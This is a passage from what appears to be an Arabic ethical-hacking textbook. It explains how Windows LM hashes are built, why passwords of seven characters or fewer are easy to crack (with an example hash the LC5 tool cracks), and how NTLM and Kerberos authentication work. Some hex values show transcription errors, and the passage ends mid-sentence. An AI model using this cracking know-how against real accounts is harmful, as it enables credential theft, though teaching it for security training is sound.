‫ﻣن ﻛل ﻧﺻف اﻟﺳﺑﻌﺔ ﺑﺎﯾت‪ ،‬ﯾﺗم ﺗﺷﯾد ﻣﻔﺗﺎح ‪ DES‬ﺛﻣﺎﻧﯾﺔ ﺑﺎﯾت‪ .‬ﯾﺗم ﺗﺷﻔﯾر ﻣﻔﺗﺎح ‪ DES‬ﺛﻣﺎﻧﯾﺔ ﺑﺎﯾت ﻣﻊ " ‪ ." magic number‬ﺛم ﯾﺗم‬
‫ﺗوﺻﯾل ﻧﺗﺎﺋﺞ اﻟﺗﺷﻔﯾر ﻣﻊ " ‪ " magic number‬ﻟﺗﻛوﯾن ھﺎش ذات اﺗﺟﺎه واﺣد ﻣن ‪ 16‬ﺑﺎﯾت‪ .‬ھذه اﻟﻘﯾﻣﺔ ھﻲ اﻟﮭﺎش ذات اﻻﺗﺟﺎه اﻟواﺣد‬
‫)‪(LAN Manager‬ﻟﻛﻠﻣﺔ اﻟﻣرور‪ .‬ﺣﯾث ﯾﺗم اﺷﺗﻘﺎق ال ‪8‬ﺑﺎﯾت اﻷوﻟﻰ ﻣن ‪ 7‬أﺣرف اﻷوﻟﻰ ﻟﻛﻠﻣﺔ اﻟﻣرور وﯾﺗم اﺷﺗﻘﺎق ‪ 8‬ﺑﺎﯾت اﻟﺛﺎﻧﯾﺔ ﻣن‬
‫ﺧﻼل اﻟﺣرف ‪ 8‬أﺣرف ﻟﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﻛون ﻣن ‪ 14‬ﺣرف‪ .‬ﻣﻌﺎ ﯾﻘوﻣوا ﺑﺗﺷﯾﯾد ﻗﯾﻣﺔ اﻟﮭﺎش ذات اﻻﺗﺟﺎه اﻟواﺣد ذات اﻟطول ‪ 16‬ﺑﺎﯾت‪ .‬ھذا‬
‫ﻗﯾﻣﺔ اﻟﮭﺎش ﻟﻛﻠﻣﺔ ﻣرور ﻻ ﺗﺗﺟﺎوز ‪ 14‬ﺣرف‪.‬‬
‫إذا ً‪ ،‬إذا ﻛﺎﻧت ﻛﻠﻣﺔ اﻟﻣرور ﻋﺑﺎره ﻋن ‪ 7‬أﺣرف او اﻗل‪ ،‬ﻓﺈن اﻟﻧﺻف اﻟﺛﺎﻧﻲ ھو داﺋﻣﺎ‪ . oxAAD3B435BS1404EE‬ﻋﻧدﻣﺎ ﯾﺗم اﺳﺗﺧدام‬
‫ﻛﻠﻣﺎت اﻟﻣرور ‪ ،LM‬ﻓﻣن اﻟﺳﮭل ﻋﻠﻰ ﻣﮭﺎﺟﻣﻲ ﻛﻠﻣﺎت اﻟﻣرور اﻟﻛﺷف ﻋن اﻟﺣروف اﻟﺛﺎﻣﻧﺔ‪ ،‬إذا ﻛﺎن ﻣوﺟودا‪ .‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬إذا ﻛﺎن‬
‫اﻟﻣﺳﺗﺧدم ﻟدﯾﮫ ﻛﻠﻣﺔ ﻣرور ﻟﮭﺎش ‪ LM‬ﻣن‪ ، OxC23413A8A1E7665f AAD3B435B51404EE‬ﻓﺎن ﺗطﺑﻖ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور‬
‫‪ LC5‬ﯾﻛﺷف ﻋن ﻛﻠﻣﺔ اﻟﺳر ﺑﺎﺳم " ‪ " WELCOME‬ﻣﻊ اﻟﻘﻠﯾل ﺟدا ﻣن اﻟﺟﮭد‪.‬‬
‫ﻟﺣﺳن اﻟﺣظ‪ ،‬واﺟﮭت ﻣﺎﯾﻛروﺳوﻓت ھذه اﻟﻘﺿﺎﯾﺎ واﺳﺗﺧدﻣت اﻵن ﺧوارزﻣﯾﺔ أﻛﺛر أﻣﻧﺎ ودﻋت ﻹﻧﺷﺎء ھﺎش ﻣن اﻟﻧوع ‪ NTLM‬ﻟﻛﻠﻣﺔ اﻟﻣرور‬
‫اﻟﺧﺎﺻﺔ ﺑﮫ‪ .‬وﻣﻊ ذﻟك‪ ،‬ﻓﺎن ﻣﺧﺗﺑر اﻻﺧﺗراق‪ ،‬ﺳوف ﻻ ﯾزال ﯾﺟد اﻟﻧظم اﻟﺗﻲ ﻣﺎ زاﻟت ﺗﺳﺗﺧدم وﺗﺧزن ‪ .LM hash‬اﻹﺻدارات اﻟﺣدﯾﺛﺔ ﻣن‬
‫وﯾﻧدوز ﻻ ﺗﺳﺗﺧدم أو ﺗﺧزﯾن ‪ LM hash‬اﻓﺗراﺿﯾﺎ؛ وﺣﺗﻰ ﻣﻊ ذﻟك‪ ،‬ھﻧﺎك ﺧﯾﺎرات ﻟﺗﻣﻛﯾن ‪ LM hash‬ﻋﻠﻰ ھذه اﻷﻧظﻣﺔ‪ .‬وﯾﺗم ﺗﻧﻔﯾذ ھذه‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪316‬‬

‫"اﻟﻣﯾزة" ﻟدﻋم اﻟﺗواﻓﻖ ﻣﻊ اﻟﻧظم اﻟﻘدﯾﻣﺔ‪ .‬ﻛﻣﻼﺣظﺔ ﺟﺎﻧﺑﯾﺔ‪ ،‬ﯾﺟب ﻋﻠﯾك داﺋﻣﺎ اﻟﺗرﻗﯾﺔ‪ ،‬أو اﻟﺗوﻗف ﻋن اﺳﺗﺧدام أي ﻣن اﻟﺑراﻣﺞ اﻟﺗﻲ ﺗطﻠب ﻣﻧك‬
‫اﺳﺗﺧدام ‪ .LM hash‬اﻷﻧظﻣﺔ اﻟﻘدﯾﻣﺔ ﻏﺎﻟﺑﺎ ﻣﺎ ﺗﺿﻊ اﻟﺷﺑﻛﺔ ﺑﺄﻛﻣﻠﮭﺎ ﻟﻠﺧطر‪.‬‬

‫ﻛﻠﻣﺔ اﻟﻣرور ‪ LAN Manager OWF‬ﻗد ﺗﺻل اﻟﻰ ‪ 16‬ﺑﺎﯾت ﻋﻛس ‪ LM‬اﻟﻌﺎدﯾﺔ اﻟﺗﻲ ﺗﺻل اﻟﻰ ‪ 14‬ﺑﺎﯾت ﻓﻘط‪ .‬ﺣﯾث ‪ 7‬أﺣرف ﻣن ﻛﻠﻣﺔ‬
‫اﻟﻣرور اﻷوﻟﻰ ﺗﺳﺗﺧدم ﻹﻧﺷﺎء ‪ 8‬ﺑﺎﯾت اﻷوﻟﻰ ﻣن ‪ LAN Manager OWF‬وﺗﺳﺗﺧدم ‪ 7‬أﺣرف اﻟﺛﺎﻧﯾﺔ ﻣن ﻛﻠﻣﺔ اﻟﻣرور ﻓﻲ إﻧﺷﺎء ‪ 8‬ﺑﺎﯾت‬
‫ﻣن ‪.LAN Manager OWF‬‬

‫‪ NTLMv2‬ھو ﺑروﺗوﻛول ﻣﺻﺎدﻗﺔ اﻟﺗوﺛﯾﻖ‪/‬اﻻﺳﺗﺟﺎﺑﺔ)‪ (challenge/response authentication‬واﻟﺗﻲ ﺗﻘدم ﺗﺣﺳن ﻟﻸوﺿﺎع اﻷﻣﻧﯾﺔ‬
‫ﻋﺑر ﺑروﺗوﻛول ‪ LM‬اﻟﺗﻲ ﻋﻔﺎ ﻋﻠﯾﮭﺎ اﻟزﻣن‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﻓﺈن ھذه اﻟﻧظم ﻟدﯾﮭﺎ ﻣﺳﺗوى ﻟﺿﺑط ﻣﺻﺎدﻗﺔ ‪ LAN Manager‬إﻟﻰ‬
‫‪.Send NTLMv2 responses only‬‬
‫ﻣﺜﺎل أﺧﺮ ﻹﻧﺸﺎء ھﺎش ‪(LM“Hash” Generation) LM‬‬

‫‪ LM hash‬ﯾطﻠﻖ ﻋﻠﯾﮫ أﯾﺿﺎ ﺑﺎﺳم ‪ LAN Manager Hash‬ﯾﺳﺗﺧدم ﻣن ﻗﺑل اﻟﻌدﯾد ﻣن إﺻدارات ﻧظم اﻟﺗﺷﻐﯾل ‪ Windows‬ﻟﺗﺧزﯾن‬
‫ﻛﻠﻣﺎت اﻟﺳر اﻟﺗﻲ ھﻲ أﻗل ﻣن ‪ 15‬ﺣرﻓﺎ‪ .‬وﯾوﺿﺢ اﻟﺷﻛل اﻟﺗﺎﻟﻲ ﻋﻣﻠﯾﺔ ﺗوﻟﯾد ‪ LM Hash‬ﻛﻠﻣﺔ ﻣرور اﻟﻣﺳﺗﺧدم)‪. (cehpass1‬‬

‫ﻓﻲ ﻋﻣﻠﯾﺔ ﺗوﻟﯾد ‪ LM‬ھﺎش‪ ،‬أوﻻ ﯾﺗم ﺗﺣوﯾل أﺣرف اﻟﻛﻠﻣﺔ إذا ﻛﺎﻧت ﺻﻐﯾره إﻟﻰ أﺣرف ﻛﺑﯾرة؛ ﻓﻲ ھذا اﻟﻣﺛﺎل‪ ،‬ﯾﻛون ﻧﺗﺎﺋﺞ ھذه اﻟﻌﻣﻠﯾﺔ‬
‫"‪ ."CEHPASS1‬ﺛم‪ ،‬ﺑﻌد ذﻟك اﻟﻧﺎﺗﺞ‪ ،‬أي ‪ ،CEHPASS1‬ﯾﻘوم ﺑﺗﻘﺳﯾﻣﮫ إﻟﻰ ﻗﺳﻣﯾن ﻛل ﻗﺳم ﻋﺑﺎره ﻋن ﺳﺑﻊ ﺳﻼﺳل اﻷﺣرف؛ ﻓﻲ ھذا‬
‫اﻟﻣﺛﺎل‪ ،‬ﻓﺎن اﻟﻧﺎﺗﺞ ﯾﻛون" ‪" CEHPASS‬و" ******‪" 1‬ﺣﯾث ﯾﺣﺗوي اﻟﺳﻠﺳﻠﺔ اﻟﺛﺎﻧﯾﺔ ﺣرف واﺣد ﻓﻘط‪ .‬ﻟﺟﻌل اﻟﺳﻠﺳﻠﺔ اﻟﺛﺎﻧﯾﺔ ﺳﻠﺳﻠﺔ ﺳﺑﻌﺔ‬
‫أﺣرف‪ ،‬ﻧﻘوم ﺑﺗطوﯾﻠﮭﺎ ﻣﻊ اﻷﺣرف ﻓﺎرﻏﺔ‪ ،‬ﺛم ﯾﺗم اﺳﺗﺧدام ﺳﻼﺳل اﻟﺳﺑﻌﺔ أﺣرف اﻻﺛﻧﯾن ﻛﻣﻔﺗﺎح ﺗﺷﻔﯾر ﻟﺗﺷﻔﯾر اﻟﻣﺣﺗوى ﺑﺎﺳﺗﺧدام ﺗﺷﻔﯾر‬
‫‪ (Digital Encryption Standard) DES‬اﻟﺷﻔرات اﻟﻣﺗﻣﺎﺛﻠﺔ)‪ . (symmetric cipher‬وأﺧﯾرا‪ ،‬ﻹﻧﺷﺎء ھﺎش ‪ ،LM‬ذﻟك ﻋن طرﯾﻖ‬
‫رﺑطﮭﻣﺎ ﺑﺑﻌض )‪ (DES-encryption‬ﻟﯾﺻﺑﺣﺎ ﻣﺗﺳﻠﺳﻠﯾن‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪317‬‬

‫‪LM, NTLMv1, and NTLMv2‬‬

‫ﻟﻣﻌﺎﻟﺟﺔ اﻟﻣﺷﺎﻛل اﻟﻣوﺟودة ﻓﻲ ‪ ،NTLM1‬ﻋرﺿت ﺷرﻛﺔ ﻣﺎﯾﻛروﺳوﻓت ‪ NTLM‬اﻹﺻدار ‪ ،2‬ودﻋت اﺳﺗﺧداﻣﮭﺎ ﻛﻠﻣﺎ ﻛﺎن ذﻟك ﻣﻣﻛﻧﺎ‪.‬‬
‫ﯾﺳرد اﻟﺟدول اﻟﺗﺎﻟﻲ اﻟﻣﯾزات ﻣن أﺳﺎﻟﯾب اﻟﻣﺻﺎدﻗﺔ اﻟﺛﻼﺛﺔ‪.‬‬

‫‪NTLM Authentication‬‬

‫)‪ NTLM (NT LAN Manager‬ھو ﺑروﺗوﻛول اﻟﻣﺻﺎدﻗﺔ اﻟﻣﺳﺗﺧدﻣﺔ ﻓﻲ اﻟﺷﺑﻛﺎت اﻟﺗﻲ ﺗﺗﺿﻣن أﻧظﻣﺔ ﺗﺷﻐﯾل ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ‪،‬‬
‫وﻋﻠﻰ اﻷﻧظﻣﺔ اﻟﻣﺳﺗﻘﻠﺔ‪ .‬وﻣن ﻗﺑل اﻟﻌدﯾد ﻣن ﻣﻧﺗﺟﺎت ﻣﺎﯾﻛروﺳوﻓت ﻹﺟراء ﻣﺻﺎدﻗﺔ )‪ ،(challenge/response‬وھو ﻧظﺎم اﻟﻣﺻﺎدﻗﺔ‬
‫اﻻﻓﺗراﺿﻲ اﻟذي ﯾﺳﺗﺧدﻣﮫ ﺟدار ﺣﻣﺎﯾﺔ ﻣﺎﯾﻛروﺳوﻓت وﻣﻧﺗﺟﺎت ﺧﺎدم اﻟﺑروﻛﺳﻲ‪ .‬وﻗد ﺗم ﺗطوﯾر ھذا اﻟﺑرﻧﺎﻣﺞ ﻟﻣﻌﺎﻟﺟﺔ ﻣﺷﺎﻛل اﻟﻌﻣل ﻣﻊ ﺗﻘﻧﯾﺎت‬
‫ﺟﺎﻓﺎ ﻓﻲ ﺑﯾﺋﺔ ‪ .Microsoft‬وﻧظرا ﻷﻧﮫ ﻻ ﯾوﺟد أي ﻣن ﻣواﺻﻔﺎت اﻟﺑروﺗوﻛول اﻟرﺳﻣﻲ‪ ،‬ﻓﻠﯾس ھﻧﺎك ﻣﺎ ﯾﺿﻣن أﻧﮫ ﯾﻌﻣل ﺑﺷﻛل ﺻﺣﯾﺢ ﻓﻲ‬
‫ﻛل ﺣﺎﻟﺔ‪ .‬ﻓﻘد ﻛﺎن ﻋﻠﻰ ﺑﻌض ﻣن ﻣﻧﺗﺟﺎت وﯾﻧدوز‪ ،‬ﺣﯾث ﻋﻣل ﺑﻧﺟﺎح‪.‬‬
‫ﯾﺿﯾف ‪ Microsoft Kerberos‬ﺣزﻣﺔ أﻣﺎن أﻛﺑر أﻣﺎﻧﺎ ً ﻣن أﻧظﻣﺔ ‪ NTLM‬ﻋﻠﻰ ﺷﺑﻛﺔ اﻻﺗﺻﺎل‪ .‬ﻋﻠﻰ اﻟرﻏم ﻣن أن ‪Microsoft‬‬
‫‪ Kerberos‬ھو ﺑروﺗوﻛول اﻻﺧﺗﯾﺎر‪ ،‬ﻟﻛن ﻻ ﯾزال ﯾﺗم دﻋم ‪ .NTLM‬ﯾﺟب أﯾﺿﺎ اﺳﺗﺧدام ‪ NTLM‬ﻟﻣﺻﺎدﻗﺔ ﺗﺳﺟﯾل اﻟدﺧول ﻋﻠﻰ اﻷﻧظﻣﺔ‬
‫اﻟﻣﺳﺗﻘﻠﺔ‪.‬‬
‫ﺑﯾﺎﻧﺎت اﻋﺗﻣﺎد ‪ NTLM‬ﺗﺳﺗﻧد إﻟﻰ اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾﺗم اﻟﺣﺻول ﻋﻠﯾﮭﺎ أﺛﻧﺎء ﻋﻣﻠﯾﺔ ﺗﺳﺟﯾل اﻟدﺧول‪ ،‬وﺗﺗﺄﻟف ﻣن اﺳم اﻟدوﻣﯾن واﺳم اﻟﻣﺳﺗﺧدم‪،‬‬
‫وھﺎش ﻛﻠﻣﺔ ﻣرور اﻟﻣﺳﺗﺧدم ذات اﻻﺗﺟﺎه اﻟواﺣد‪ .‬ﯾﺳﺗﺧدم ‪ NTLM‬ﺑروﺗوﻛول )‪ (challenge/response‬اﻟﻣﺷﻔر ﻟﻣﺻﺎدﻗﺔ ﻣﺳﺗﺧدم دون‬
‫إرﺳﺎل ﻛﻠﻣﺔ ﻣرور اﻟﻣﺳﺗﺧدم ﻋﺑر اﻟﺳﻠك‪ .‬ﺑدﻻً ﻣن ذﻟك‪ ،‬ﻧظﺎم طﻠب اﻟﻣﺻﺎدﻗﺔ ﯾﺟب إﺟراء ﻋﻣﻠﯾﺔ ﺣﺳﺎﺑﯾﺔ اﻟﺗﻲ ﺗﺛﺑت أن ﻟدﯾﮭﺎ إﻣﻛﺎﻧﯾﺔ اﻟوﺻول‬
‫إﻟﻰ ﺑﯾﺎﻧﺎت اﻋﺗﻣﺎد ‪ NTLM‬اﻟﻣﺿﻣون‪.‬‬
‫ﯾﺗﻛون ‪ NTLM authentication‬ﻣن ﺑروﺗوﻛوﻟﯾن‪ NTLM authentication protocol :‬و‪ .LM authentication protocol‬ھذه‬
‫اﻟﺑروﺗوﻛوﻻت ﺗﺳﺗﺧدم ﻣﻧﮭﺟﯾﺔ ھﺎش ﻣﺧﺗﻠﻔﺔ ﻟﺗﺧزﯾن ﻛﻠﻣﺎت ﻣرور اﻟﻣﺳﺗﺧدﻣﯾن ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ‪.SAM‬‬
‫‪NTLM Authentication Protocol‬‬

‫اﻟﻣﻧﺗﺟﺎت اﻟﺗﻲ ﯾدﻋﻣﮭﺎ ﺑروﺗوﻛول ‪ NTML‬ﺗم ﻧﺷرھﺎ ﻓﻘط ﻣن ﻗﺑل ﻣﺎﯾﻛروﺳوﻓت ﺑﺳﺑب ﻋدم ﺗواﻓر اﻟﻣواﺻﻔﺎت اﻟرﺳﻣﯾﺔ ﻟﻠﺑروﺗوﻛول‪.‬‬
‫ﻧﺗﯾﺟﺔ ﻟذﻟك‪ ،‬ﻓﻲ ﺑﯾﺋﺔ ﺷﺑﻛﺔ اﺗﺻﺎل‪ ، Microsoft‬ﻓﺄن اﻟﻣﻧﺗﺟﺎت اﻷﺧرى )‪ (non-MS product‬ﻛﻠﮭﺎ ﺗﻘرﯾﺑﺎ ﺗﺟد ﺻﻌوﺑﺔ ﻓﻲ أداء ﻣﮭﺎﻣﮭﺎ‬
‫ﺑﺷﻛل ﺻﺣﯾﺢ‪ .‬أﯾﺿﺎ ﻓﻲ ﺑﯾﺋﺎت ﺗطوﯾر اﻟﺑرﻣﺟﯾﺎت ﺗﻌﺎﻧﻲ ﻣن ﻧﻔس اﻟﻣﺷﻛﻠﺔ؛ ﻻ ﺗوﺟد ﻣﻠﻔﺎت ﻣﻛﺗﺑﺎت )‪(libraries‬اﻟﺗﻲ ﺗﻧﻔذ ھذا اﻟﻣﺧطط‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪318‬‬

‫واﻟﺗوﺛﯾﻖ‪ ،‬ﻣﺎ ﻋدا ﺗﻠك اﻟﻣﺟﻣﻌﺔ ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز‪ .‬ﻓﻲ ﻣﺟﺗﻣﻊ اﻟﻣﺻدر اﻟﻣﻔﺗوح‪ ،‬ھﻧﺎك اﻟﻌدﯾد ﻣن اﻟﻣﺷﺎرﯾﻊ اﻟﺗﻲ ﺗرﻛز ﻋﻠﻰ ﺗﻧﻔﯾذ ھذا‬
‫اﻟﺑروﺗوﻛول‪ ،‬وﻟﻛن ﻣﻌظم ھذه ﺗﻣﻠك ﺟﺎﻓﺎ ﻛﺑﯾﺋﺔ ﻟﮭﺎ‪.‬‬
‫ﻋدم ﺗواﻓر ﻣﺧطط اﻟﻣﺻﺎدﻗﺔ ﻓﻲ ﻣﻧﺻﺔ اﻟﺟﺎﻓﺎ ﯾﻣﻛن أن ﯾﺳﺑب ﻣﺷﺎﻛل ﺧطﯾرة ﻓﻲ ﻣﺟﺎل ﺗطوﯾر وﻧﺷر اﻟﺗطﺑﯾﻘﺎت اﻟﺗﻌﺎوﻧﯾﺔ اﻟﺗﻲ ﺗﻌﺗﻣد ﻋﻠﻰ‬
‫ﺗﻘﻧﯾﺎت ﻣﺛل ﺧدﻣﺎت اﻟوﯾب ‪ SOAP‬اﻟﺗﻲ ﺗﻌﺗﻣد ﻋﻠﻰ ﺑروﺗوﻛول ‪.HTTP‬‬

‫ﻣﺻﺎدﻗﺔ ‪ (NTLM Authentication) NTLM‬ھو ﻣﺧطط )‪ ،(challenge/response‬ﯾﺗﻛون ﻣن ﺛﻼث رﺳﺎﺋل‪ ،‬ﯾﺷﺎر إﻟﯾﮫ ﻋﺎدة‬
‫ﻛﺎﻟﻧوع ‪) 1‬اﻟﺗﻔﺎوض]‪ ،([negotiation‬واﻟﻧوع ‪) 2‬اﻟﺗﺣدي]‪ ([challenge‬وﻧوع ‪) 3‬اﻟﻣﺻﺎدﻗﺔ]‪ .([authentication‬وھﻲ ﺗﻌﻣل أﺳﺎﺳﺎ‬
‫ﻣﺛل ھذا‪:‬‬
‫‪ -1‬ﯾرﺳل اﻟﻌﻣﯾل رﺳﺎﻟﺔ اﻟﻧوع ‪ 1‬إﻟﻰ اﻟﻣﻠﻘم‪ .‬أﺳﺎﺳﺎ ھذا ﯾﺣﺗوي ﻋﻠﻰ ﻗﺎﺋﻣﺔ ﺑﺎﻟﻣﯾزات اﻟﺗﻲ ﯾرﯾدھﺎ اﻟﻌﻣﯾل وطﻠﺑت ﻣن اﻟﺧﺎدم‪.‬‬
‫‪ -2‬اﻟﻣﻠﻘم ﯾﺳﺗﺟﯾب ﻣﻊ رﺳﺎﻟﺔ ﻧوع ‪ .2‬وھذا ﯾﺣﺗوي ﻋﻠﻰ ﻗﺎﺋﻣﺔ ﺑﺎﻟﻣﯾزات اﻟﻣﺗﻔﻖ ﻋﻠﯾﮭﺎ ﻣن ﻗﺑل اﻟﻣﻠﻘم‪ .‬اﻷھم ﻣن ذﻟك‪ ،‬وﻣﻊ ذﻟك‪ ،‬ﻓﺈﻧﮫ‬
‫ﯾﺣﺗوي ﻋﻠﻰ ‪ challenge‬واﻟذي ﺗم إﻧﺷﺎؤھﺎ ﺑواﺳطﺔ اﻟﻣﻠﻘم‪.‬‬
‫‪ -3‬اﻟﻌﻣﯾل ﯾﻘوم ﺑﺎﻟرد ﻋﻠﻰ ‪ challenge‬ﻣﻊ رﺳﺎﻟﺔ ﻧوع ‪ .3‬وھذا ﯾﺣﺗوي ﻋﻠﻰ ﻋدة أﺟزاء ﻣن اﻟﻣﻌﻠوﻣﺎت ﺣول اﻟﻌﻣﯾل‪ ،‬ﺑﻣﺎ ﻓﻲ ذﻟك‬
‫اﻟدوﻣﯾن واﺳم اﻟﻣﺳﺗﺧدم ﻟﻠﻣﺳﺗﺧدم اﻟﻌﻣﯾل‪.‬‬
‫‪NTLM Authentication Process‬‬

‫ﯾﺗﺿﻣن ‪ NTLM‬ﺛﻼﺛﺔ أﺳﺎﻟﯾب ﻣن )‪ ،NTLMv1 ،LM :(challenge/response authentication‬و‪ .NTLMv2‬ﻋﻣﻠﯾﺔ‬


‫اﻟﻣﺻﺎدﻗﺔ ﻟﺟﻣﯾﻊ اﻷﺳﺎﻟﯾب ھﻲ ﻧﻔﺳﮭﺎ‪ .‬واﻟﻔرق اﻟوﺣﯾد ﺑﯾﻧﮭم ھو ﻣﺳﺗوى اﻟﺗﺷﻔﯾر‪ .‬ﻓﻲ ﻣﺻﺎدﻗﺔ ‪ ،NTLM‬اﻟﻌﻣﯾل واﻟﺧﺎدم ﯾﺗﻔﺎوﺿوا ﻋﻠﻰ‬
‫ﺑروﺗوﻛول اﻟﻣﺻﺎدﻗﺔ‪ .‬وﯾﺗم إﻧﺟﺎز ھذا ﻣن ﺧﻼل)‪. Microsoft negotiated Security Support Provider (SSP‬‬

‫ﻋﻣﻠﯾﺔ ﻣﺻﺎدﻗﺔ اﻟﻌﻣﯾل إﻟﻰ وﺣدة ﺗﺣﻛم اﻟدوﻣﯾن ﺑﺎﺳﺗﺧدام أي ﻣن ﺑروﺗوﻛوﻻت ‪ NTLM‬ﺗظﮭر ﻣن ﺧﻼل اﻟﺧطوات اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫ﯾﻘوم اﻟﻌﻣﯾل ﺑﻛﺗﺎﺑﺔ اﺳم اﻟﻣﺳﺗﺧدم وﻛﻠﻣﺔ اﻟﻣرور ﻓﻲ إطﺎر ﺗﺳﺟﯾل اﻟدﺧول‪.‬‬ ‫‪o‬‬
‫ﯾﻘوم ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﺑﺗﺷﻐﯾل ﻛﻠﻣﺔ اﻟﻣرور ﻣن ﺧﻼل ﺧوارزﻣﯾﺔ اﻟﮭﺎش وﯾﻘوم ﺑﺈﻧﺷﺎء اﻟﮭﺎش ﻟﻛﻠﻣﺔ اﻟﻣرور اﻟذي ﺗم إدﺧﺎﻟﮫ ﻣن‬ ‫‪o‬‬
‫ﺧﻼل إطﺎر ﺗﺳﺟﯾل اﻟدﺧول‪.‬‬
‫ﻛﻣﺑﯾوﺗر اﻟﻌﻣﯾل ﯾﻘوم ﺑﺈرﺳﺎل طﻠب ﺗﺳﺟﯾل اﻟدﺧول ﺟﻧﺑﺎ إﻟﻰ ﺟﻧب ﻣﻊ اﺳم اﻟدوﻣﯾن إﻟﻰ وﺣدة ﺗﺣﻛم اﻟدوﻣﯾن‪.‬‬ ‫‪o‬‬
‫وﺣدة ﺗﺣﻛم اﻟدوﻣﯾن ﯾوﻟد ﺳﻠﺳﻠﺔ أﺣرف ﻋﺷواﺋﯾﺔ ‪ 16‬ﺑﺎﯾت ﯾﺳﻣﻰ "‪ "nonce‬وﯾرﺳﻠﮭﺎ إﻟﻰ ﺟﮭﺎز ﻛﻣﺑﯾوﺗر اﻟﻌﻣﯾل‪.‬‬ ‫‪o‬‬
‫ﻛﻣﺑﯾوﺗر اﻟﻌﻣﯾل ﯾﻘوم ﺑﺗﺷﻔﯾر ‪ nonce‬ﻣﻊ ھﺎش ﻛﻠﻣﺔ ﻣرور اﻟﻣﺳﺗﺧدم وإرﺳﺎﻟﮫ إﻟﻰ وﺣدة ﺗﺣﻛم اﻟدوﻣﯾن‪.‬‬ ‫‪o‬‬
‫وﺣدة ﺗﺣﻛم اﻟدوﻣﯾن ﺗﺳﺗرد ھﺎش ﻛﻠﻣﺔ ﻣرور اﻟﻣﺳﺗﺧدم ﻣن ‪ SAM‬وﯾﺳﺗﺧدم ﻟﺗﺷﻔﯾر ‪ .nonce‬وﺣدة ﺗﺣﻛم اﻟدوﻣﯾن ﯾﻘﺎرن اﻟﻘﯾﻣﺔ‬ ‫‪o‬‬
‫اﻟﻣﺷﻔرة ﻣﻊ اﻟﻘﯾﻣﺔ اﻟواردة ﻣن اﻟﻌﻣﯾل‪ .‬إذا ﺗطﺎﺑﻘت اﻟﻘﯾم‪ ،‬ﻓﺗﻧﺟﺢ ﻣﺻﺎدﻗﺔ اﻟﻌﻣﯾل وﺗﺳﺟﯾل اﻟدﺧول‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪319‬‬

‫‪Kerberos‬‬

‫‪ Kerberos‬ھو ﺑروﺗوﻛول ﻣﺻﺎدﻗﺔ اﻟﺷﺑﻛﺔ)‪ . (network authentication protocol‬وھﻲ ﻣﺻﻣﻣﺔ ﻟﺗوﻓﯾر ﻣﺻﺎدﻗﺔ ﻗوﯾﺔ ﻟﻠﺗطﺑﯾﻘﺎت‬
‫اﻟﻌﻣﯾل‪/‬اﻟﺧﺎدم ﺑﺎﺳﺗﺧدام ‪ .secret-key cryptography‬وھذا ﯾوﻓر اﻟﻣﺻﺎدﻗﺔ اﻟﻣﺗﺑﺎدﻟﺔ‪ .‬ﺣﯾث ﻛل ﻣن اﻟﺧﺎدم واﻟﻣﺳﺗﺧدم ﯾﺗﺣﻘﻘﺎ ﻣن ھوﯾﺔ ﻛل‬
‫ﻣﻧﮭﻣﺎ اﻵﺧر‪ .‬اﻟرﺳﺎﺋل اﻟﻣرﺳﻠﺔ ﻣن ﺧﻼل ﺑروﺗوﻛول ‪ Kerberos‬ﻣﺣﻣﯾﺔ ﺿد ھﺟﻣﺎت إﻋﺎدة اﻟﺗﺷﻐﯾل واﻟﺗﻧﺻت‪.‬‬
‫‪ Kerberos‬ﯾﺟﻌل ﻣن اﺳﺗﺧدام )‪) Key Distribution Center (KDC‬ﺧﺎدم ﻟﺗوزﯾﻊ اﻟﻣﻔﺎﺗﯾﺢ( ‪ ،‬طرف ﺛﺎﻟث ﻣوﺛوق ﺑﮫ‪ .‬ھذا ﯾﺗﻛون ﻣن‬
‫ﻗﺳﻣﯾن ﻣﻧﻔﺻﻠﯾن ﻣﻧطﻘﯾﺎ‪ :‬ﺧﺎدم اﻟﻣﺻﺎدﻗﺔ ))‪ (Authentication server (AS‬وﺧﺎدم ﻣﻧﺢ اﻟﺗذاﻛر ))‪.(Ticket Granting Server (TGS‬‬
‫‪ Kerberos‬ﯾﻌﻣل ﻋﻠﻰ أﺳﺎس "اﻟﺗذاﻛر)‪ " (tickets‬ﻹﺛﺑﺎت ھوﯾﺔ اﻟﻣﺳﺗﺧدم‪.‬‬
‫آﻟﯾﺔ ﺗﻔوﯾض ‪ Kerberos‬ﺗﻌﺗﻣد ﻋﻠﻰ ﺗوﻓﯾر ﺗذﻛره ﻟﻠﻣﺳﺗﺧدم ﻣﻊ )‪ Ticket Granting Ticket (TGT‬اﻟذي ﯾﺧدم ﻣﺷﺎرﻛﺔ اﻟﻣﺻﺎدﻗﺔ‬
‫ﻟﻠوﺻول ﻻﺣﻘﺎ إﻟﻰ ﺧدﻣﺎت ﻣﻌﯾﻧﺔ‪ ،‬اﻟدﺧول اﻟﻣوﺣد اﻟذي ﻻ ﯾطﻠب ﻣن اﻟﻣﺳﺗﺧدم إﻋﺎدة إدﺧﺎل ﻛﻠﻣﺔ اﻟﻣرور ﻣرة أﺧرى ﻟﻠوﺻول إﻟﻰ أﯾﺔ ﻣن‬
